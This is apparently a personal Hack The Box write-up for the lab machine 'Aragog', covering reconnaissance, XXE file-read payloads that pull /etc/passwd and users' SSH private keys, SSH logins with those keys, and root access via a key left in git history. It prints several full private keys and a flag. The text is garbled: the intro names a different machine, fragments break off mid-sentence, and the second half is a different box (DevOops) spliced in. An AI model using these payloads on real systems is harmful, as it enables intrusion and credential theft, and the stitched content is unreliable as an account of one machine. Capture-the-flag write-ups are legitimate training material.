🖥️
Cybersecurity
  • 👋Welcome Page
    • About Me
  • 🗒️Progress List
  • ⌨️Cybersecurity
    • Tip & Tricks
      • Add Host
      • Bash Upgrade
      • Custom Function
      • Docker Container
      • Nuclei
  • 🖥️Hack The Box
    • Linux Machine
      • Easy Machine
        • Shocker
    • Windows Machine
      • Easy Machine
        • Active
    • Old Machines
      • Easy Machine
        • Academy
        • Bashed
        • Bastion
        • Cap
        • Explore
        • Forest
        • Friendzone
        • Haystack
        • Help
        • Irked
        • Lame
        • Mirai
        • Networked
        • OpenAdmin
        • Photobomb
        • Precious
        • MonitorsTwo
        • Sau
        • Topology
      • Medium Machine
        • Aragog
        • Bitlab
        • Canape
        • DevOops
        • Forgot
        • Jarvis
        • Lightweight
        • Magic
        • Tenten
      • Hard Machine
        • Spider
        • Zipper
    • Current Season
      • Headless
      • Perfection
  • 📙BurpSuite Labs
    • 🔬Laboratories
      • Code Template Page
      • HTTP Host Header Attacks
Powered by GitBook
On this page
  1. Hack The Box
  2. Old Machines
  3. Medium Machine

Aragog

#Linux #Web #Wordpress #XXE

Tenten is an medium-rated Linux machine from HackTheBox created by egre55. In the current post, my IP is 10.10.14.76, and the target’s IP is 10.129.102.78

Recon

Local Terminal
> ping -c 1 10.129.102.78

PING 10.129.102.78 (10.129.102.78) 56(84) bytes of data.
64 bytes from 10.129.102.78: icmp_seq=1 ttl=63 time=260 ms

--- 10.129.102.78 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 260.032/260.032/260.032/0.000 ms

The machine is alive, and by the TTL (close but no more than 64), it is possible to think that the target is a Linux Machine.

Local Terminal
nmap -p- --open -sS --min-rate 5000 -Pn -n -vvv 10.129.102.78 -oN AllPorts
Nmap scan report for 10.129.102.78
Host is up, received user-set (0.26s latency).
Scanned at 2023-09-14 11:22:03 -03 for 21s
Not shown: 65487 closed ports, 45 filtered ports
Reason: 65487 resets and 45 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 62
22/tcp open  ssh     syn-ack ttl 62
80/tcp open  http    syn-ack ttl 62
Local Terminal
nmap -sCV -p 21,22,80 10.129.102.78 -oN Target
nmap -sCV -p 21,22,80 10.129.102.78 -oN Target
Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-14 11:22 -03
Nmap scan report for 10.129.102.78
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.76
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://aragog.htb/
Service Info: Host: aragog.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

There are two open ports. First the port 22 with ssh, if you search about "OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 launchpad", we can see that the target is an "Ubuntu Xenial". And about the port 80, the web page, if you search "Apache httpd 2.4.18 launchpad", it confirms that is an Ubuntu Xenial.

Both are the same, so there is a significant reduced chance to find a Docker Container here.

The port 80 have a redirect, add the IP to the /etc/hosts and launch another nmap scan.

Port 21 - FTP

Local Terminal
> ftp 10.129.102.78
Connected to 10.129.102.78.
220 (vsFTPd 3.0.3)
Name (10.129.102.78:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir
229 Entering Extended Passive Mode (|||46497|)
150 Here comes the directory listing.
-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.

ftp> get test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||46086|)
150 Opening BINARY mode data connection for test.txt (86 bytes).
100% |*********************************************************************************************************|    86      237.91 KiB/s    00:00 ETA
226 Transfer complete.
86 bytes received in 00:00 (0.33 KiB/s)

ftp> exit
221 Goodbye.

> cat test.txt
<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

Looks like an XML file with custom labels.

Port 80

> whatweb http://aragog.htb
http://aragog.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.102.78], 
Title[Apache2 Ubuntu Default Page: It works]

Nothing from whatweb, but now we know that has an Ubuntu Default Page

  • http://aragog.htb/

Stuck, there is nothing to do, so let's try a fuzzing process with html and php.

Local Terminal
wfuzz -c --hc=404 --hw=28 -t 200 -w /opt/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt -z list,php-html http://aragog.htb/FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://aragog.htb/FUZZ.FUZ2Z
Total requests: 441092

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000002:   200        375 L    968 W      11321 Ch    "index - html"
000012013:   200        3 L      6 W        46 Ch       "hosts - php"

  • http://aragog.htb/hosts.php

It's fixed, maybe it's related to the other file found, test.txt. There is a way to send files with POST, of course.

Local Terminal
> curl -s -X POST -d @test.txt http://aragog.htb/hosts.php

There are 62 possible hosts for 255.255.255.192

It reacts, let's see if we can see the output from an XXE.

exploit.txt
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>
Local Terminal
> curl -s -X POST -d @exploit.txt http://aragog.htb/hosts.php

There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<...>
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
florian:x:1000:1000:florian,,,:/home/florian:/bin/bash
cliff:x:1001:1001::/home/cliff:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
<...>

And it works!! Additionally from the /etc/passwd we make a successful user enumeration, by searching who has /bin/bash available.

[+] root + florian + cliff

Or you can use:

curl -s -X POST -d @test.txt http://aragog.htb/hosts.php | grep "sh$"

Exploitation

First, let's see the code of the current php file.

exploit_two.txt
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/florian/.ssh/id_rsa"> ]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>
Local Terminal
curl -s -X POST -d @exploit_two.txt http://aragog.htb/hosts.php
Output
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA50DQtmOP78gLZkBjJ/JcC5gmsI21+tPH3wjvLAHaFMmf7j4d
+YQEMbEg+yjj6/ybxJAsF8l2kUhfk56LdpmC3mf/sO4romp9ONkl9R4cu5OB5ef8
lAjOg67dxWIo77STqYZrWUVnQ4n8dKG4Tb/z67+gT0R9lD9c0PhZwRsFQj8aKFFn
1R1B8n9/e1PB0AJ81PPxCc3RpVJdwbq8BLZrVXKNsg+SBUdbBZc3rBC81Kle2CB+
Ix89HQ3deBCL3EpRXoYVQZ4EuCsDo7UlC8YSoEBgVx4IgQCWx34tXCme5cJa/UJd
d4Lkst4w4sptYMHzzshmUDrkrDJDq6olL4FyKwIDAQABAoIBAAxwMwmsX0CRbPOK
AQtUANlqzKHwbVpZa8W2UE74poc5tQ12b9xM2oDluxVnRKMbyjEPZB+/aU41K1bg
TzYI2b4mr90PYm9w9N1K6Ly/auI38+Ouz6oSszDoBeuo9PS3rL2QilOZ5Qz/7gFD
9YrRCUij3PaGg46mvdJLmWBGmMjQS+ZJ7w1ouqsIANypMay2t45v2Ak+SDhl/SDb
/oBJFfnOpXNtQfJZZknOGY3SlCWHTgMCyYJtjMCW2Sh2wxiQSBC8C3p1iKWgyaSV
0qH/3gt7RXd1F3vdvACeuMmjjjARd+LNfsaiu714meDiwif27Knqun4NQ+2x8JA1
sWmBdcECgYEA836Z4ocK0GM7akW09wC7PkvjAweILyq4izvYZg+88Rei0k411lTV
Uahyd7ojN6McSd6foNeRjmqckrKOmCq2hVOXYIWCGxRIIj5WflyynPGhDdMCQtIH
zCr9VrMFc7WCCD+C7nw2YzTrvYByns/Cv+uHRBLe3S4k0KNiUCWmuYsCgYEA8yFE
rV5bD+XI/iOtlUrbKPRyuFVUtPLZ6UPuunLKG4wgsGsiVITYiRhEiHdBjHK8GmYE
tkfFzslrt+cjbWNVcJuXeA6b8Pala7fDp8lBymi8KGnsWlkdQh/5Ew7KRcvWS5q3
HML6ac06Ur2V0ylt1hGh/A4r4YNKgejQ1CcO/eECgYEAk02wjKEDgsO1avoWmyL/
I5XHFMsWsOoYUGr44+17cSLKZo3X9fzGPCs6bIHX0k3DzFB4o1YmAVEvvXN13kpg
ttG2DzdVWUpwxP6PVsx/ZYCr3PAdOw1SmEodjriogLJ6osDBVcMhJ+0Y/EBblwW7
HF3BLAZ6erXyoaFl1XShozcCgYBuS+JfEBYZkTHscP0XZD0mSDce/r8N07odw46y
kM61To2p2wBY/WdKUnMMwaU/9PD2vN9YXhkTpXazmC0PO+gPzNYbRe1ilFIZGuWs
4XVyQK9TWjI6DoFidSTGi4ghv8Y4yDhX2PBHPS4/SPiGMh485gTpVvh7Ntd/NcI+
7HU1oQKBgQCzVl/pMQDI2pKVBlM6egi70ab6+Bsg2U20fcgzc2Mfsl0Ib5T7PzQ3
daPxRgjh3CttZYdyuTK3wxv1n5FauSngLljrKYXb7xQfzMyO0C7bE5Rj8SBaXoqv
uMQ76WKnl3DkzGREM4fUgoFnGp8fNEZl5ioXfxPiH/Xl5nStkQ0rTA==
-----END RSA PRIVATE KEY-----

Reverse Shell

Local Terminal
> chmod 600 id_rsa
> ssh -i id_rsa florian@10.129.102.78

florian@aragog:~$ whoami
florian
florian@aragog:~$ cat user.txt

It works!

Privileges Escalation

Target Terminal [florian]
florian@aragog:~$ id
uid=1000(florian) gid=1000(florian) groups=1000(florian)

florian@aragog:~$ cd /
florian@aragog:/$ find \-perm -4000 2>/dev/null
./bin/su
./bin/mount
<...>

florian@aragog:/$ getcap -r / 2>/dev/null
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep

florian@aragog:/$  cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

There is nothing around here, let's try with pspy or with procmon at /tmp.

procmon.sh
#!/bin/bash

function ctrl_c(){
	echo -e "\n[!] Exit [!]\n"
	exit 1
}

# Ctrl+C
trap ctrl_c INT

old_process=$(ps -eo command)

while true; do
	new_process=$(ps -eo command)
	diff <(echo "$old_process")<(echo "$new_process") | grep "[\>\<]" | grep -vE "procmon|command|kworker"
	old_processs=$new_process
done
Local Terminal
> curl -s -X POST -d @exploit.txt http://aragog.htb/hosts.php

There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
<...>

A

Local Terminal
> curl -s -X POST -d @test.txt http://aragog.htb/hosts.php

There are 62 possible hosts for 255.255.255.192

It e.

Local Terminal
> curl -s -X POST -d @test.txt http://aragog.htb/hosts.php

There are 62 possible hosts for 255.255.255.192

It

  • http://10.129.102.140:5000/feed

    • Just an image

  • http://10.129.102.140:5000/upload

    • Place to upload files, with XML elements, interesting.

First, upload an empty file to see how it reacts, with vi test.xml, the create the proper XML, with vi exploit.xml

test.xml
Testing
exploit.xml
<elements>
        <Author>Tartox</Author>
        <Subject>String</Subject>
        <Content>Stringtwo</Content>
</elements>

From here we got a lot of information. First, the output is visible, this means that is possible to execute an XXE, and second, there is an user called "roosa" at the system.

Exploitation

Let's see if the exploits works, creating a file with vi exploit_proof.xml, then upload it.

exploit_proof.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<elements>
	<Author>Tartox</Author>
	<Subject>&xxe;</Subject>
	<Content>String</Content>
</elements>

Perfect, it works, remember that with Ctrl+U (view:source) you can see in a better format the targeted file.

Now, time to exploit, upload exploit_exec.xml.

exploit_exec.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa"> ]>
<elements>
	<Author>Tartox</Author>
	<Subject>&xxe;</Subject>
	<Content>String</Content>
</elements>

In many machines, this exploits fails, an alternative to these situation, because the target use php, is the use of wrappers, like "php://filter/convert.base64-encode/resource=/var/www/html/index.php" after SYSTEM.

Reverse Shell - roosa

Perfect, we can read the id_rsa.

id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAuMMt4qh/ib86xJBLmzePl6/5ZRNJkUj/Xuv1+d6nccTffb/7
9sIXha2h4a4fp18F53jdx3PqEO7HAXlszAlBvGdg63i+LxWmu8p5BrTmEPl+cQ4J
R/R+exNggHuqsp8rrcHq96lbXtORy8SOliUjfspPsWfY7JbktKyaQK0JunR25jVk
v5YhGVeyaTNmSNPTlpZCVGVAp1RotWdc/0ex7qznq45wLb2tZFGE0xmYTeXgoaX4
9QIQQnoi6DP3+7ErQSd6QGTq5mCvszpnTUsmwFj5JRdhjGszt0zBGllsVn99O90K
m3pN8SN1yWCTal6FLUiuxXg99YSV0tEl0rfSUwIDAQABAoIBAB6rj69jZyB3lQrS
JSrT80sr1At6QykR5ApewwtCcatKEgtu1iWlHIB9TTUIUYrYFEPTZYVZcY50BKbz
ACNyme3rf0Q3W+K3BmF//80kNFi3Ac1EljfSlzhZBBjv7msOTxLd8OJBw8AfAMHB
lCXKbnT6onYBlhnYBokTadu4nbfMm0ddJo5y32NaskFTAdAG882WkK5V5iszsE/3
koarlmzP1M0KPyaVrID3vgAvuJo3P6ynOoXlmn/oncZZdtwmhEjC23XALItW+lh7
e7ZKcMoH4J2W8OsbRXVF9YLSZz/AgHFI5XWp7V0Fyh2hp7UMe4dY0e1WKQn0wRKe
8oa9wQkCgYEA2tpna+vm3yIwu4ee12x2GhU7lsw58dcXXfn3pGLW7vQr5XcSVoqJ
Lk6u5T6VpcQTBCuM9+voiWDX0FUWE97obj8TYwL2vu2wk3ZJn00U83YQ4p9+tno6
NipeFs5ggIBQDU1k1nrBY10TpuyDgZL+2vxpfz1SdaHgHFgZDWjaEtUCgYEA2B93
hNNeXCaXAeS6NJHAxeTKOhapqRoJbNHjZAhsmCRENk6UhXyYCGxX40g7i7T15vt0
ESzdXu+uAG0/s3VNEdU5VggLu3RzpD1ePt03eBvimsgnciWlw6xuZlG3UEQJW8sk
A3+XsGjUpXv9TMt8XBf3muESRBmeVQUnp7RiVIcCgYBo9BZm7hGg7l+af1aQjuYw
agBSuAwNy43cNpUpU3Ep1RT8DVdRA0z4VSmQrKvNfDN2a4BGIO86eqPkt/lHfD3R
KRSeBfzY4VotzatO5wNmIjfExqJY1lL2SOkoXL5wwZgiWPxD00jM4wUapxAF4r2v
vR7Gs1zJJuE4FpOlF6SFJQKBgHbHBHa5e9iFVOSzgiq2GA4qqYG3RtMq/hcSWzh0
8MnE1MBL+5BJY3ztnnfJEQC9GZAyjh2KXLd6XlTZtfK4+vxcBUDk9x206IFRQOSn
y351RNrwOc2gJzQdJieRrX+thL8wK8DIdON9GbFBLXrxMo2ilnBGVjWbJstvI9Yl
aw0tAoGAGkndihmC5PayKdR1PYhdlVIsfEaDIgemK3/XxvnaUUcuWi2RhX3AlowG
xgQt1LOdApYoosALYta1JPen+65V02Fy5NgtoijLzvmNSz+rpRHGK6E8u3ihmmaq
82W3d4vCUPkKnrgG8F7s3GL6cqWcbZBd0j9u88fUWfPxfRaQU3s=
-----END RSA PRIVATE KEY-----
Local Terminal
> chmod 600 id_rsa
> ssh -i id_rsa roosa@10.129.102.140

See the content of the "Cross-Site Scripting" exploit, it's the version 4.1.0, it should be that.

Target Terminal [roosa]
roosa@devoops:~$ whoami
roosa
roosa@devoops:~$ cat user.txt
2d8b779192e11e67d6d8f2039338a37f

Privileges Escalation

Target Terminal [roosa]
roosa@devoops:~$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
# group (adm), you can see the system's log with > ls -l /var/log 

roosa@devoops:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.4 LTS
Release:        16.04
Codename:       xenial #Nice

roosa@devoops:~$ ls -la
total 156
<...>
drwx------  3 root  root  4096 Mar 26  2021 .dbus
drwxrwxr-x  4 roosa roosa 4096 Mar 26  2021 deploy
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Desktop
-rw-r--r--  1 roosa roosa   25 Mar 21  2018 .dmrc
<...>
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Templates
-r--------  1 roosa roosa   33 Sep 13 15:04 user.txt
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Videos
drwxrwxr-x  3 roosa roosa 4096 Mar 26  2021 work
<...>

A lot of files, but there are two curious folder, deploy and work. Let's check work.

Target Terminal [roosa]
roosa@devoops:~$ cd work
roosa@devoops:~/work$ ls -la
total 12
drwxrwxr-x  3 roosa roosa 4096 Mar 26  2021 .
drwxr-xr-x 22 roosa roosa 4096 Sep 23  2022 ..
drwxrwx---  5 roosa roosa 4096 Mar 26  2021 blogfeed

roosa@devoops:~/work$ cd blogfeed
roosa@devoops:~/work/blogfeed$ ls -la
total 28
drwxrwx--- 5 roosa roosa 4096 Mar 26  2021 .
drwxrwxr-x 3 roosa roosa 4096 Mar 26  2021 ..
drwxrwx--- 8 roosa roosa 4096 Mar 26  2021 .git
-rw-rw---- 1 roosa roosa  104 Mar 19  2018 README.md
drwxrwx--- 3 roosa roosa 4096 Mar 26  2021 resources
-rwxrw-r-- 1 roosa roosa  180 Mar 21  2018 run-gunicorn.sh
drwxrwx--- 2 roosa roosa 4096 Mar 26  2021 src

Good, there is git, in those cases is always a good practice to see the commits for old relevant information... ALWAYS! But first, let's see if there is another hidden file here.

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ find .
.
./run-gunicorn.sh
./resources
./resources/integration
./resources/integration/authcredentials.key
./.git
./.git/objects
./.git/objects/33
./.git/objects/33/e87c312c08735a02fa9c796021a4a3023129ad
<...>

A file with credentials?

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ cat ./resources/integration/authcredentials.key
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEApc7idlMQHM4QDf2d8MFjIW40UickQx/cvxPZX0XunSLD8veN
ouroJLw0Qtfh+dS6y+rbHnj4+HySF1HCAWs53MYS7m67bCZh9Bj21+E4fz/uwDSE
23g18kmkjmzWQ2AjDeC0EyWH3k4iRnABruBHs8+fssjW5sSxze74d7Ez3uOI9zPE
sQ26ynmLutnd/MpyxFjCigP02McCBrNLaclcbEgBgEn9v+KBtUkfgMgt5CNLfV8s
ukQs4gdHPeSj7kDpgHkRyCt+YAqvs3XkrgMDh3qI9tCPfs8jHUvuRHyGdMnqzI16
ZBlx4UG0bdxtoE8DLjfoJuWGfCF/dTAFLHK3mwIDAQABAoIBADelrnV9vRudwN+h
LZ++l7GBlge4YUAx8lkipUKHauTL5S2nDZ8O7ahejb+dSpcZYTPM94tLmGt1C2bO
JqlpPjstMu9YtIhAfYF522ZqjRaP82YIekpaFujg9FxkhKiKHFms/2KppubiHDi9
oKL7XLUpSnSrWQyMGQx/Vl59V2ZHNsBxptZ+qQYavc7bGP3h4HoRurrPiVlmPwXM
xL8NWx4knCZEC+YId8cAqyJ2EC4RoAr7tQ3xb46jC24Gc/YFkI9b7WCKpFgiszhw
vFvkYQDuIvzsIyunqe3YR0v8TKEfWKtm8T9iyb2yXTa+b/U3I9We1P+0nbfjYX8x
6umhQuECgYEA0fvp8m2KKJkkigDCsaCpP5dWPijukHV+CLBldcmrvUxRTIa8o4e+
OWOMW1JPEtDTj7kDpikekvHBPACBd5fYnqYnxPv+6pfyh3H5SuLhu9PPA36MjRyE
4+tDgPvXsfQqAKLF3crG9yKVUqw2G8FFo7dqLp3cDxCs5sk6Gq/lAesCgYEAyiS0
937GI+GDtBZ4bjylz4L5IHO55WI7CYPKrgUeKqi8ovKLDsBEboBbqRWcHr182E94
SQMoKu++K1nbly2YS+mv4bOanSFdc6bT/SAHKdImo8buqM0IhrYTNvArN/Puv4VT
Nszh8L9BDEc/DOQQQzsKiwIHab/rKJHZeA6cBRECgYEAgLg6CwAXBxgJjAc3Uge4
eGDe3y/cPfWoEs9/AptjiaD03UJi9KPLegaKDZkBG/mjFqFFmV/vfAhyecOdmaAd
i/Mywc/vzgLjCyBUvxEhazBF4FB8/CuVUtnvAWxgJpgT/1vIi1M4cFpkys8CRDVP
6TIQBw+BzEJemwKTebSFX40CgYEAtZt61iwYWV4fFCln8yobka5KoeQ2rCWvgqHb
8rH4Yz0LlJ2xXwRPtrMtJmCazWdSBYiIOZhTexe+03W8ejrla7Y8ZNsWWnsCWYgV
RoGCzgjW3Cc6fX8PXO+xnZbyTSejZH+kvkQd7Uv2ZdCQjcVL8wrVMwQUouZgoCdA
qML/WvECgYEAyNoevgP+tJqDtrxGmLK2hwuoY11ZIgxHUj9YkikwuZQOmFk3EffI
T3Sd/6nWVzi1FO16KjhRGrqwb6BCDxeyxG508hHzikoWyMN0AA2st8a8YS6jiOog
bU34EzQLp7oRU/TKO6Mx5ibQxkZPIHfgA1+Qsu27yIwlprQ64+oeEr0=
-----END RSA PRIVATE KEY-----

Another id_rsa, go to home to check for more users.

Another way to see the user list with bash, is by reading the /etc/passwd file and check who has the "bash" available.

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ cd /home

roosa@devoops:/home$ ls -la
total 28
drwxr-xr-x  7 root     root     4096 Mar 26  2021 .
drwxr-xr-x 23 root     root     4096 Sep 23  2022 ..
drwxr-xr-x  2 blogfeed blogfeed 4096 Mar 26  2021 blogfeed
drwxr-xr-x  4 git      git      4096 Sep 23  2022 git
drwx------  2 root     root     4096 Mar 26  2021 lost+found
drwxr-xr-x 16 osboxes  osboxes  4096 Mar 26  2021 osboxes
drwxr-xr-x 22 roosa    roosa    4096 Sep 23  2022 roosa

Many user to test the id_rsa, if is not the correct one, we should check the past-commits for mistakes.

Copy the authcredentials.keys as id_rsa to the tmp folder, then connect through ssh.

Target Terminal [roosa]
roosa@devoops:/home$ cd /tmp
roosa@devoops:/tmp$ cp /home/roosa/work/blogfeed/resources/integration/authcredentials.key /tmp/id_rsa
roosa@devoops:/tmp$ chmod 600 id_rsa
roosa@devoops:/tmp$ ssh -i id_rsa root@localhost
    # It requires password with every user, forget about it.

Return to the blogfeed folder with cd /home/roosa/work/blogfeed

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ git log

"reverted accidental commit with proper key" looks like an interesting mistake, copy the commit code.

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ git log -p 33e87c312c08735a02fa9c796021a4a3023129ad

It shows a deleted id_rsa, copy the red one at /tmp and try to use it.

id_rsa_two
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
vr+5Ui0nD+YBKyYuiN+4CB8jSQvwOG+LlA3IGAzVf56J0WP9FILH/NwYW2iovTRK
nz1y2vdO3ug94XX8y0bbMR9Mtpj292wNrxmUSQ5glioqrSrwFfevWt/rEgIVmrb+
CCjeERnxMwaZNFP0SYoiC5HweyXD6ZLgFO4uOVuImILGJyyQJ8u5BI2mc/SHSE0c
F9DmYwbVqRcurk3yAS+jEbXgObupXkDHgIoMCwIDAQABAoIBAFaUuHIKVT+UK2oH
uzjPbIdyEkDc3PAYP+E/jdqy2eFdofJKDocOf9BDhxKlmO968PxoBe25jjjt0AAL
gCfN5I+xZGH19V4HPMCrK6PzskYII3/i4K7FEHMn8ZgDZpj7U69Iz2l9xa4lyzeD
k2X0256DbRv/ZYaWPhX+fGw3dCMWkRs6MoBNVS4wAMmOCiFl3hzHlgIemLMm6QSy
NnTtLPXwkS84KMfZGbnolAiZbHAqhe5cRfV2CVw2U8GaIS3fqV3ioD0qqQjIIPNM
HSRik2J/7Y7OuBRQN+auzFKV7QeLFeROJsLhLaPhstY5QQReQr9oIuTAs9c+oCLa
2fXe3kkCgYEA367aoOTisun9UJ7ObgNZTDPeaXajhWrZbxlSsOeOBp5CK/oLc0RB
GLEKU6HtUuKFvlXdJ22S4/rQb0RiDcU/wOiDzmlCTQJrnLgqzBwNXp+MH6Av9WHG
jwrjv/loHYF0vXUHHRVJmcXzsftZk2aJ29TXud5UMqHovyieb3mZ0pcCgYEAxR41
IMq2dif3laGnQuYrjQVNFfvwDt1JD1mKNG8OppwTgcPbFO+R3+MqL7lvAhHjWKMw
+XjmkQEZbnmwf1fKuIHW9uD9KxxHqgucNv9ySuMtVPp/QYtjn/ltojR16JNTKqiW
7vSqlsZnT9jR2syvuhhVz4Ei9yA/VYZG2uiCpK0CgYA/UOhz+LYu/MsGoh0+yNXj
Gx+O7NU2s9sedqWQi8sJFo0Wk63gD+b5TUvmBoT+HD7NdNKoEX0t6VZM2KeEzFvS
iD6fE+5/i/rYHs2Gfz5NlY39ecN5ixbAcM2tDrUo/PcFlfXQhrERxRXJQKPHdJP7
VRFHfKaKuof+bEoEtgATuwKBgC3Ce3bnWEBJuvIjmt6u7EFKj8CgwfPRbxp/INRX
S8Flzil7vCo6C1U8ORjnJVwHpw12pPHlHTFgXfUFjvGhAdCfY7XgOSV+5SwWkec6
md/EqUtm84/VugTzNH5JS234dYAbrx498jQaTvV8UgtHJSxAZftL8UAJXmqOR3ie
LWXpAoGADMbq4aFzQuUPldxr3thx0KRz9LJUJfrpADAUbxo8zVvbwt4gM2vsXwcz
oAvexd1JRMkbC7YOgrzZ9iOxHP+mg/LLENmHimcyKCqaY3XzqXqk9lOhA3ymOcLw
LS4O7JPRqVmgZzUUnDiAVuUHWuHGGXpWpz9EGau6dIbQaUUSOEE=
-----END RSA PRIVATE KEY-----
Target Terminal [roosa]
roosa@devoops:/tmp$ chmod 600 id_rsa_two
roosa@devoops:/tmp$ ssh -i id_rsa_two root@localhost
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Fri Sep 23 09:46:30 2022
root@devoops:~# cat root.txt

And it works, the machine is done.

PreviousMedium MachineNextBitlab

Last updated 1 year ago

🖥️
  • Recon
  • Port 21 - FTP
  • Port 80
  • Exploitation
  • Reverse Shell
  • Privileges Escalation
  • Exploitation
  • Reverse Shell - roosa
  • Privileges Escalation
Yes... Ubuntu Default Page
From Wappalyzer, the site uses PHP
This place says XXE everywhere
Fails with test.xml
Works with exploit.xml
Target's /etc/passwd
Unencrypted id_rsa
Color Sample